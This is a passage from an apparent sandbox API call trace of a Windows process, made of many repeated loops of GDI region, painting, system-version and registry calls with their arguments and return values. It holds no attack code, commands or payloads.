hrgnSrc2=0x470401d3, iMode=1) returned 1 [0088.235] CombineRgn (hrgnDst=0x10410c3, hrgnSrc1=0x450401d6, hrgnSrc2=0x470401d3, iMode=4) returned 2 [0088.235] CreateSolidBrush (color=0xff) returned 0x21010c1 [0088.235] CreateSolidBrush (color=0xff0000) returned 0x11010c4 [0088.235] DeleteObject (ho=0x11010c4) returned 1 [0088.235] DeleteObject (ho=0x470401d3) returned 1 [0088.235] DeleteObject (ho=0x450401d6) returned 1 [0088.235] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.235] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.235] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.235] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.235] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.235] BeginPath (hdc=0x0) returned 0 [0088.235] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.235] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.235] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.235] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.235] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.235] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.236] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.236] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.236] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x480401d3 [0088.236] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x460401d6 [0088.236] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410c5 [0088.236] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410c6 [0088.236] CombineRgn (hrgnDst=0x10410c5, hrgnSrc1=0x480401d3, hrgnSrc2=0x460401d6, iMode=1) returned 1 [0088.236] CombineRgn (hrgnDst=0x10410c6, hrgnSrc1=0x480401d3, hrgnSrc2=0x460401d6, iMode=4) returned 2 [0088.236] CreateSolidBrush (color=0xff) returned 0x21010c4 [0088.236] CreateSolidBrush (color=0xff0000) returned 0x11010c7 [0088.236] DeleteObject (ho=0x11010c7) returned 1 [0088.236] DeleteObject (ho=0x460401d6) returned 1 [0088.236] DeleteObject (ho=0x480401d3) returned 1 [0088.236] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.236] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.236] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.236] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.236] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.236] BeginPath (hdc=0x0) returned 0 [0088.236] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.236] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.236] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.236] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.236] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.236] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.236] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.236] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.237] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x470401d6 [0088.237] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x490401d3 [0088.237] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410c8 [0088.237] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410c9 [0088.237] CombineRgn (hrgnDst=0x10410c8, hrgnSrc1=0x470401d6, hrgnSrc2=0x490401d3, iMode=1) returned 1 [0088.237] CombineRgn (hrgnDst=0x10410c9, hrgnSrc1=0x470401d6, hrgnSrc2=0x490401d3, iMode=4) returned 2 [0088.237] CreateSolidBrush (color=0xff) returned 0x21010c7 [0088.237] CreateSolidBrush (color=0xff0000) returned 0x11010ca [0088.237] DeleteObject (ho=0x11010ca) returned 1 [0088.237] DeleteObject (ho=0x490401d3) returned 1 [0088.237] DeleteObject (ho=0x470401d6) returned 1 [0088.237] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.237] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.237] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.237] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.237] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.237] BeginPath (hdc=0x0) returned 0 [0088.237] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.237] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.237] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.237] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.237] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.237] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.237] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.237] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.237] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4a0401d3 [0088.237] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x480401d6 [0088.237] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410cb [0088.237] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410cc [0088.237] CombineRgn (hrgnDst=0x10410cb, hrgnSrc1=0x4a0401d3, hrgnSrc2=0x480401d6, iMode=1) returned 1 [0088.237] CombineRgn (hrgnDst=0x10410cc, hrgnSrc1=0x4a0401d3, hrgnSrc2=0x480401d6, iMode=4) returned 2 [0088.237] CreateSolidBrush (color=0xff) returned 0x21010ca [0088.237] CreateSolidBrush (color=0xff0000) returned 0x11010cd [0088.238] DeleteObject (ho=0x11010cd) returned 1 [0088.238] DeleteObject (ho=0x480401d6) returned 1 [0088.238] DeleteObject (ho=0x4a0401d3) returned 1 [0088.238] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.238] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.238] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.238] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.238] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.238] BeginPath (hdc=0x0) returned 0 [0088.238] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.238] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.238] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.238] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.238] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.238] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.238] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.238] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.238] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x490401d6 [0088.238] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4b0401d3 [0088.238] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410ce [0088.238] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410cf [0088.238] CombineRgn (hrgnDst=0x10410ce, hrgnSrc1=0x490401d6, hrgnSrc2=0x4b0401d3, iMode=1) returned 1 [0088.238] CombineRgn (hrgnDst=0x10410cf, hrgnSrc1=0x490401d6, hrgnSrc2=0x4b0401d3, iMode=4) returned 2 [0088.238] CreateSolidBrush (color=0xff) returned 0x21010cd [0088.238] CreateSolidBrush (color=0xff0000) returned 0x11010d0 [0088.238] DeleteObject (ho=0x11010d0) returned 1 [0088.238] DeleteObject (ho=0x4b0401d3) returned 1 [0088.238] DeleteObject (ho=0x490401d6) returned 1 [0088.238] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.238] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.238] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.239] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.239] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.239] BeginPath (hdc=0x0) returned 0 [0088.239] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.239] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.239] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.239] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.239] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.239] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.239] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.239] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.239] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4c0401d3 [0088.239] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4a0401d6 [0088.239] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410d1 [0088.239] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410d2 [0088.239] CombineRgn (hrgnDst=0x10410d1, hrgnSrc1=0x4c0401d3, hrgnSrc2=0x4a0401d6, iMode=1) returned 1 [0088.239] CombineRgn (hrgnDst=0x10410d2, hrgnSrc1=0x4c0401d3, hrgnSrc2=0x4a0401d6, iMode=4) returned 2 [0088.239] CreateSolidBrush (color=0xff) returned 0x21010d0 [0088.239] CreateSolidBrush (color=0xff0000) returned 0x11010d3 [0088.239] DeleteObject (ho=0x11010d3) returned 1 [0088.239] DeleteObject (ho=0x4a0401d6) returned 1 [0088.239] DeleteObject (ho=0x4c0401d3) returned 1 [0088.239] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.239] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.239] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.239] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.239] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.239] BeginPath (hdc=0x0) returned 0 [0088.239] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.239] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.239] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.239] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.239] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.239] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.240] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.240] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.240] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4b0401d6 [0088.240] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4d0401d3 [0088.240] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410d4 [0088.240] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410d5 [0088.240] CombineRgn (hrgnDst=0x10410d4, hrgnSrc1=0x4b0401d6, hrgnSrc2=0x4d0401d3, iMode=1) returned 1 [0088.240] CombineRgn (hrgnDst=0x10410d5, hrgnSrc1=0x4b0401d6, hrgnSrc2=0x4d0401d3, iMode=4) returned 2 [0088.240] CreateSolidBrush (color=0xff) returned 0x21010d3 [0088.240] CreateSolidBrush (color=0xff0000) returned 0x11010d6 [0088.240] DeleteObject (ho=0x11010d6) returned 1 [0088.240] DeleteObject (ho=0x4d0401d3) returned 1 [0088.240] DeleteObject (ho=0x4b0401d6) returned 1 [0088.240] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.240] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.240] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.240] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.240] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.240] BeginPath (hdc=0x0) returned 0 [0088.240] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.240] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.240] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.240] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.240] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.240] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.240] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.240] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.241] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4e0401d3 [0088.241] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4c0401d6 [0088.241] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410d7 [0088.241] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410d8 [0088.241] CombineRgn (hrgnDst=0x10410d7, hrgnSrc1=0x4e0401d3, hrgnSrc2=0x4c0401d6, iMode=1) returned 1 [0088.241] CombineRgn (hrgnDst=0x10410d8, hrgnSrc1=0x4e0401d3, hrgnSrc2=0x4c0401d6, iMode=4) returned 2 [0088.241] CreateSolidBrush (color=0xff) returned 0x21010d6 [0088.241] CreateSolidBrush (color=0xff0000) returned 0x11010d9 [0088.241] DeleteObject (ho=0x11010d9) returned 1 [0088.241] DeleteObject (ho=0x4c0401d6) returned 1 [0088.241] DeleteObject (ho=0x4e0401d3) returned 1 [0088.241] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.241] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.241] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.241] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.241] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.241] BeginPath (hdc=0x0) returned 0 [0088.241] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.241] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.241] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.241] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.241] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.241] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.241] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.241] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.241] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4d0401d6 [0088.241] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4f0401d3 [0088.241] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410da [0088.241] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410db [0088.241] CombineRgn (hrgnDst=0x10410da, hrgnSrc1=0x4d0401d6, hrgnSrc2=0x4f0401d3, iMode=1) returned 1 [0088.241] CombineRgn (hrgnDst=0x10410db, hrgnSrc1=0x4d0401d6, hrgnSrc2=0x4f0401d3, iMode=4) returned 2 [0088.242] CreateSolidBrush (color=0xff) returned 0x21010d9 [0088.242] CreateSolidBrush (color=0xff0000) returned 0x11010dc [0088.242] DeleteObject (ho=0x11010dc) returned 1 [0088.242] DeleteObject (ho=0x4f0401d3) returned 1 [0088.242] DeleteObject (ho=0x4d0401d6) returned 1 [0088.242] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.242] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.242] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.242] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.242] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.242] BeginPath (hdc=0x0) returned 0 [0088.242] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.242] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.242] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.242] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.242] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.242] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.242] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.242] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.242] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x500401d3 [0088.242] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4e0401d6 [0088.242] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410dd [0088.242] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410de [0088.242] CombineRgn (hrgnDst=0x10410dd, hrgnSrc1=0x500401d3, hrgnSrc2=0x4e0401d6, iMode=1) returned 1 [0088.242] CombineRgn (hrgnDst=0x10410de, hrgnSrc1=0x500401d3, hrgnSrc2=0x4e0401d6, iMode=4) returned 2 [0088.242] CreateSolidBrush (color=0xff) returned 0x21010dc [0088.242] CreateSolidBrush (color=0xff0000) returned 0x11010df [0088.242] DeleteObject (ho=0x11010df) returned 1 [0088.242] DeleteObject (ho=0x4e0401d6) returned 1 [0088.242] DeleteObject (ho=0x500401d3) returned 1 [0088.242] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.242] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, 